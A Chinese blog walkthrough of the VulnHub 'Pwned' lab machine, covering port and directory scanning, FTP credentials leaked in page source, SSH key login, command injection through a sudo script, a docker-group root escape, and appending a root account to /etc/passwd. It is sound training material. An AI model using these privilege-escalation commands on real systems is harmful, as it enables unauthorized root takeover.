vulnhub靶机-Pwned

最新推荐文章于 2024-07-28 23:19:17 发布
最新推荐文章于 2024-07-28 23:19:17 发布
阅读量1.9k 收藏 2
点赞数 2
分类专栏: vulnhub靶机
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43784056/article/details/107340384
版权

有这么久没写了,这次就写一下目前vulnhub最新出的靶机Pwned,目的是拿到3个flag,难度是easy,但是较我以往的博客多了一种提权方式

1、寻找靶机地址:192.168.0.118

nmap -sn 192.168.0.0/24

2、扫描靶机开放端口

 

root@kali:~# nmap -p- -A 192.168.0.118
Starting Nmap 7.80 ( https://nmap.org ) 
Nmap scan report for 192.168.0.118
Host is up (0.00051s latency).
Not shown: 65532 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 fe:cd:90:19:74:91:ae:f5:64:a8:a5:e8:6f:6e:ef:7e (RSA)
|   256 81:32:93:bd:ed:9b:e7:98:af:25:06:79:5f:de:91:5d (ECDSA)
|_  256 dd:72:74:5d:4d:2d:a3:62:3e:81:af:09:51:e0:14:4a (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Pwned....!!
MAC Address: 08:00:27:D7:03:E4 (Oracle VirtualBox virtual NIC)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=7/14%OT=21%CT=1%CU=35398%PV=Y%DS=1%DC=D%G=Y%M=080027%T
OS:M=5F0D6851%P=x86_64-pc-linux-gnu)SEQ(SP=106%GCD=1%ISR=104%TI=Z%CI=Z%II=I
OS:%TS=A)OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%O
OS:5=M5B4ST11NW7%O6=M5B4ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6
OS:=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O
OS:%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=
OS:0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%
OS:S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(
OS:R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=
OS:N%T=40%CD=S)

Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.51 ms 192.168.0.118

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 35.44 seconds

3、ftp连接21号端口,发现没有权限查看,应该是不允许匿名访问,需要登录,但是我们现在没有任何线索,所以现在先放着

4、访问80端口,首页没有发现什么有用的东西

接着手工尝试一些常见的文件,发现存在robots.txt

访问nothing目录,发现有一个nothing.html文件

点击nothing.html访问,右键查看源代码,也没有有用的信息

5、扫描目录,发现一个新的hidden_text

root@kali:~# gobuster dir --url http://192.168.0.118/ --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://192.168.0.118/
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/07/14 14:39:54 Starting gobuster
===============================================================
/nothing (Status: 301)
/server-status (Status: 403)
/hidden_text (Status: 301)
===============================================================
2020/07/14 14:42:39 Finished
===============================================================

访问该目录,发现一个secret.dic文件,看后缀名像是一个字典文件

点击访问之后,得到了一些目录名和文件名

将其下载下来,并使用它对网站进行目录扫描,发现了pwned.vuln是可用的

root@kali:~# wget http://192.168.0.118/hidden_text/secret.dic
--2020-07-14 16:19:18--  http://192.168.0.118/hidden_text/secret.dic
正在连接 192.168.0.118:80... 已连接。
已发出 HTTP 请求,正在等待回应... 200 OK
长度:211
正在保存至: “secret.dic”

secret.dic                         100%[==============================================================>]     211  --.-KB/s  用时 0s      

(13.8 MB/s) - 已保存 “secret.dic” [211/211])

root@kali:~# gobuster dir --url http://192.168.0.118 --wordlist secret.dic 
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://192.168.0.118
[+] Threads:        10
[+] Wordlist:       secret.dic
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/07/14 16:20:10 Starting gobuster
===============================================================
//pwned.vuln (Status: 301)
===============================================================
2020/07/14 16:20:10 Finished
===============================================================
root@kali:~#

访问该文件,右键查看源代码,发现了被注释的php代码,里面有个用户名和密码:ftpuser/B0ss_B!TcH,这个很容易就能联想到ftp登录

6、再次访问ftp。使用上面的用户名和密码进行登录,得到了两个文件,一个ssh免密登录的私钥文件和一个note.txt文件,根据note.txt文件的内容可以知道免密登录的用户是ariana


Wow you are here 

ariana won't happy about this note 

sorry ariana :( 



note.txt

7、免密登录、拿到第一个flag

root@kali:~/桌面# chmod 600 id_rsa 
root@kali:~/桌面# ssh -i id_rsa ariana@192.168.0.118
Linux pwned 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
ariana@pwned:~$ ls
ariana-personal.diary  user1.txt
ariana@pwned:~$ cat user1.txt 
congratulations you Pwned ariana 

Here is your user flag ↓↓↓↓↓↓↓

fb8d98be1265dd88bac522e1b2182140

Try harder.need become root
ariana@pwned:~$

8、提权拿到第二个flag

使用sudo -l命令可以看到能够以selena的身份免密执行/home/messenger.sh脚本文件

ariana@pwned:~$ sudo -l
Matching Defaults entries for ariana on pwned:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User ariana may run the following commands on pwned:
    (selena) NOPASSWD: /home/messenger.sh
ariana@pwned:~$

查看该脚本文件内容和权限,发现是不能修改的,但是msg存在提权漏洞

ariana@pwned:~$ cat /home/messenger.sh 
#!/bin/bash

clear
echo "Welcome to linux.messenger "
                echo ""
users=$(cat /etc/passwd | grep home |  cut -d/ -f 3)
                echo ""
echo "$users"                                                                                                                             
                echo ""                                                                                                                   
read -p "Enter username to send message : " name                                                                                          
                echo ""                                                                                                                   
read -p "Enter message for $name :" msg                                                                                                   
                echo ""
echo "Sending message to $name "

$msg 2> /dev/null

                echo ""
echo "Message sent to $name :) "
                echo ""
ariana@pwned:~$ ls -l /home/messenger.sh 
-rwxr-xr-x 1 root root 367 Jul 10 11:20 /home/messenger.sh
ariana@pwned:~$

在运行shell脚本之前,其实可以先查看一下此环境中是python2还是python3,方便待会使用python提权,因为使用脚本提权之后输入python或者python3都是看不到错误信息的,因为脚本文件中的2> /dev/null。当然,这一步其实也不是必需的。

经测验发现是python3

ariana@pwned:~$ python
-bash: python: command not found
ariana@pwned:~$ python3
Python 3.7.3 (default, Dec 20 2019, 18:57:59) 
[GCC 8.3.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> 
ariana@pwned:~$

运行该shell脚本进行提权,拿到第二个flag

ariana@pwned:~$ sudo -u selena /home/messenger.sh

Welcome to linux.messenger 


ariana:
selena:
ftpuser:

Enter username to send message : 

Enter message for  :/bin/bash

Sending message to  
id
uid=1001(selena) gid=1001(selena) groups=1001(selena),115(docker)
python3 -c "import pty;pty.spawn('/bin/bash')"
selena@pwned:/home/ariana$ cd ~
selena@pwned:~$ ls
selena-personal.diary  user2.txt
selena@pwned:~$ cat user2.txt 
711fdfc6caad532815a440f7f295c176

You are near to me. you found selena too.

Try harder to catch me
selena@pwned:~$

9、根据上面的id命令执行的结果,发现selena是docker组的,于是使用docker提权,详细的介绍可以看看这篇文章:一种通用的Docker提权方式

如果虚拟机不能通网,可以使用docker images命令查看本地有哪些镜像,直接从本地拉取

selena@pwned:~$ docker images
REPOSITORY          TAG                 IMAGE ID            CREATED             SIZE
privesc             latest              09ae39f0f8fc        7 days ago          88.3MB
<none>              <none>              e13ad046d435        7 days ago          88.3MB
alpine              latest              a24bb4013296        6 weeks ago         5.57MB
debian              wheezy              10fcec6d95c4        16 months ago       88.3MB
selena@pwned:~$

就使用alpine镜像进行提权,拿到最后的flag

selena@pwned:~$ docker run -v /:/mnt  -it alpine
/ # cd /mnt/
/mnt # ls
bin             initrd.img.old  mnt             sys
boot            lib             opt             tmp
core            lib32           proc            usr
dev             lib64           root            var
etc             libx32          run             vmlinuz
home            lost+found      sbin            vmlinuz.old
initrd.img      media           srv
/mnt # cd root/
/mnt/root # ls
root.txt
/mnt/root # cat root.txt 
4d4098d64e163d2726959455d046fd7c



You found me. i dont't expect this (◎ . ◎)

I am Ajay (Annlynn) i hacked your server left and this for you.

I trapped Ariana and Selena to takeover your server :)


You Pwned the Pwned congratulations :)

share the screen shot or flags to given contact details for confirmation 

Telegram   https://t.me/joinchat/NGcyGxOl5slf7_Xt0kTr7g

Instgarm   ajs_walker 

Twitter    Ajs_walker 
/mnt/root #

10、拓展

在这里还只是在docker容器中能够查看文件,尝试添加一个特权用户到物理机中

先在本地生成一个hash+salt的密码

root@kali:~# openssl passwd -1 -salt chounana
Password: chounana(输入的chounana是不可见的)
$1$chounana$213YN3khulXhRoSCTSBEM0
root@kali:~#

将格式修改一下

chounana:$1$chounana$213YN3khulXhRoSCTSBEM0:0:0::/root:/bin/bash

将其添加到passwd文件中,注意这里echo命令后面不能跟双引号,只能使用单引号,因为这里有$,双引号中会被当做变量来处理

最后验证一下效果,ctrl+D可退出docker环境,成功提权到物理机的root权限

/mnt/etc # echo 'chounana:$1$chounana$213YN3khulXhRoSCTSBEM0:0:0::/root:/bin/bas
h' >>passwd
/mnt/etc # selena@pwned:~$ su chounana
Password: 
root@pwned:/home/selena# id
uid=0(root) gid=0(root) groups=0(root)
root@pwned:/home/selena# cd ~
root@pwned:~# ls
root.txt
root@pwned:~# cat root.txt 
4d4098d64e163d2726959455d046fd7c



You found me. i dont't expect this (◎ . ◎)

I am Ajay (Annlynn) i hacked your server left and this for you.

I trapped Ariana and Selena to takeover your server :)


You Pwned the Pwned congratulations :)

share the screen shot or flags to given contact details for confirmation 

Telegram   https://t.me/joinchat/NGcyGxOl5slf7_Xt0kTr7g

Instgarm   ajs_walker 

Twitter    Ajs_walker 
root@pwned:~#

 

0ne_
关注
专栏目录
vulnhub靶机:GoldenEye-v1
prettyX的博客
04-06 1017
靶机介绍 靶机下载地址:https://www.vulnhub.com/entry/goldeneye-1,240/ 开始 1、ip探测,本次靶机的ip为:192.168.1.109 //kali arp-scan -l 2、nmap端口扫描 3、先尝试访问80端口 4、访问robots.txt,404 5、查看网页源码 6、继续查看这个.js文件 “Bori...
Pwned Vulnhub
logan_logan的博客
12-19 275
在浏览器输入地址打开网页 端口扫描 发现仅仅就开了三个端口; 目录枚举 使用gobuster工具发现了几个目录,接下来进行探测; gobuster dir -u http://10.36.201.103/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 3.1发现hidden_text目录下存在一个secret.dic文件,打开之后都是一些目录,下载下来之后使用gobuster工具进行枚举; gobuster..
VulnHub靶机入门篇--Kioptrix4
最新发布
2302_78903258的博客
07-28 1095
前面的知识点都跟之前题目差不多,后面出现了sql注入的利用,sqlmap工具的使用,以及获得webshell,在获得webshell之后的提权(数据库提权),以及一些linux的常用命令。
Vulnhub靶机
weixin_43902100的博客
09-21 676
Vulnhub靶机渗透测试实战(一):CHERRY: 1 下载地址:http://www.vulnhub.com/entry/cherry-1,552/ 实验环境:VMware,kali虚拟机 将下载好的镜像文件导入VMware 局域网内扫描主机 arp-scan -l 一般情况最大最小的不会是靶机的IP,所以靶机的IP为:192.168.46.130 nmap扫描主机,查看开启了那些端口 nmap -sV -p- 192.168.46.130 发现开放了80,7755两个端口,进行访问,发现两个
Vulnhub-Pwned
dahege666的博客
05-30 627
靶机IP:192.168.1.9 攻击机IP:192.168.1.7 1、扫描靶机开放端口及服务 2、访问80端口,没什么有用的信息 3、扫描一下目标的敏感信息有一个robots.txt, 4、访问nothing目录,有一个nothing.html,查看源码 也没有有用的信息 5、使用gobuster扫描目录,找到hidden_text 6、访问后有一个.dic字段文件 7、将文件下周下来,然后进行目录扫描,只有pwned.vuln是能访问的。 .
Vulnhub-靶机-SickOs 1.2
qq_43264813的博客
03-05 381
Vulnhub靶机—SickOs 1.2 本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关 文章目录Vulnhub靶机—SickOs 1.2一、信息收集二、漏洞利用三、Flag 一、信息收集 【步骤一】使用nmap确定目标靶机地址: 【命令】nmap -sP 192.168.43.0/24 【步骤二】对目标靶机进行全端口扫描: 【命令】nmap -n -T4 -sV -p- 192.168.43.54 【步骤三】尝试22端口弱口令
Vulnhub靶机系列:De-ICE: S1.120
01-09
靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有简单指导Vulnhub靶机系列:pWnOS: 2.0另外iso文件如何导入就不赘述了,安装完最好重启一下。完成上述步骤后可以netdiscover一下确定。 利用...
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
vulnhub靶机实战--FunBox3:EASY
m0_64312309的博客
09-21 658
Vulnhub介绍: Vulnhub 是一个漏洞靶场平台,里面含有大量的靶场镜像,只需要下载虚拟机镜像,导入 VMWare 或者 VirtualBox 即可启动靶场,同时它还提供了 Docker 镜像,可以使用 Docker 直接启动靶场,大大简化了渗透测试人员在搭建各种漏洞靶场时的步骤
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
vulnhub靶机BSides-Vancouver-2018-Workshop渗透笔记
liver100day的博客
05-15 482
渗透测试实战–BSides-Vancouver-2018-Workshop 靶机下载/安装 靶机下载地址:https://www.vulnhub.com/entry/brainpan-1,51/ 靶机IP地址:未知 kali渗透机地址:192.168.75.128 1.主机发现
vulnhub靶机
weixin_43902100的博客
09-28 296
vulnhub靶场:ME AND MY GIRLFRIEND: 1 靶机下载地址:http://www.vulnhub.com/entry/me-and-my-girlfriend-1,409/ 实验环境:VMware,kali虚拟机 实战WP 寻找靶机ip,arp-scan -l,发现靶机IP为192.168.46.131(如果得不到靶机的地址,可能是因为靶机的网卡信息不对参考:https://blog.csdn.net/asstart/article/details/103433065) nmap扫描
VulnHub靶机-SkyTower
Slow_的博客
02-26 761
VulnHub靶机-SkyTower 下载地址:https://www.vulnhub.com/entry/skytower-1,96/ 下载靶机后在VirtualBox下打开,网卡配置为桥接 任务:提权并获取flag 环境: 攻击机和靶机均在192.168.8.0段 攻击机:kali linux 192.168.8.108 文章目录VulnHub靶机-SkyTower一、信息搜集二、提权 一、信息搜集 要想渗透靶机,首先得知道靶机的IP是什么,我们先用nmap探测存活主机。 命令:nmap -sP 19
Vulnhub靶机——DC-1
流水不争先,争的是滔滔不绝
04-18 893
Vulnhub靶机——DC-1,cms(Drupal 7)存在框架漏洞,msf利用框架漏洞拿到普通用户的shell,再通过SUID提权
Vulnhub靶机-PumpkinFestival
ergeLXT的博客
06-28 659
需要修改本地hosts文件之后进行访问,添加pumpkins.local到hosts文件之后访问。使用 echo 命令创建一个名为alohomora的文件,其中复制了/bin/bash。本机尝试,在本机ftp登录靶机,拿到data,解压,解密到key(2)文件,然后ssh登录。登录名为admin的wp-admin用户,在得到令牌二的时候获取到一个关键字。在上面的目录中除token.txt之外,还有一个NOOOOO目录,继续访问。有一个NO目录,继续访问,经过多次遍历,找到token.txt。
Vulnhub靶机 Lin.security
菜浪马废的博客
04-27 260
给了登录账号 直接拿靶机登录 第一种方法 第二种方法
Vulnhub靶机 FourAndSix2
菜浪马废的博客
09-16 166
目标靶机ip:192.168.80.139 开放nfs 有一个压缩文件 里面有id-rsa 但是加密了 得到密码:chocolate 用户名:user 还有一层验证 cat /usr/share/wordlists/rockyou.txt | while read pass; do if ssh-keygen -c -C “user@forandsix” -P $pass -f id_rsa &>/dev/null; then echo $pass; break; fi; d.
Vulnhub靶机-Prime1
m0_74855736的博客
03-08 1063
前面目录扫描可以发现有使用WordPress,现在又获得一个密码,这边尝试wpscan去获得一个用户再配合刚刚获得的一个密码。ls #/home目录在Linux称为主目录,在该目录下面存储的是每个用户的目录。从右侧的页面一个个找php页面且带有提交按钮的,这个目录就是有写权限的。根据前面提示对获得的两个php文件参数的模糊测试,最终在index.php获得一个正确的参数是file。主题编辑器,一般来说从主题编辑器容易有有写权限的一些目录,通过遍历来看看哪些目录有写权限。
Vulnhub靶机:LAMPSECURITY_ CTF5
LainWith的博客
12-23 1149
(此系列共5台)发布日期:2009年5月10日难度:初运行环境:VMware Workstation目标:取得 root 权限补充:解压下载得到的靶机,你会看到自带的一份官方攻略主机发现端口扫描+漏洞扫描敏感信息泄露cms挂马敏感信息提权。
vulnhub靶机-jangow: 1.0.1
03-16
vulnhub靶机-jangow: 1..1是一款用于渗透测试和漏洞攻击的虚拟机。它基于Ubuntu操作系统,包含多个漏洞和弱点,供安全专业人员进行测试和实践。该靶机的目标是获取root权限,并且需要使用各种技术和工具来完成任务。对于想要提高渗透测试技能的安全从业者来说,这是一个非常有用的学习资源。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值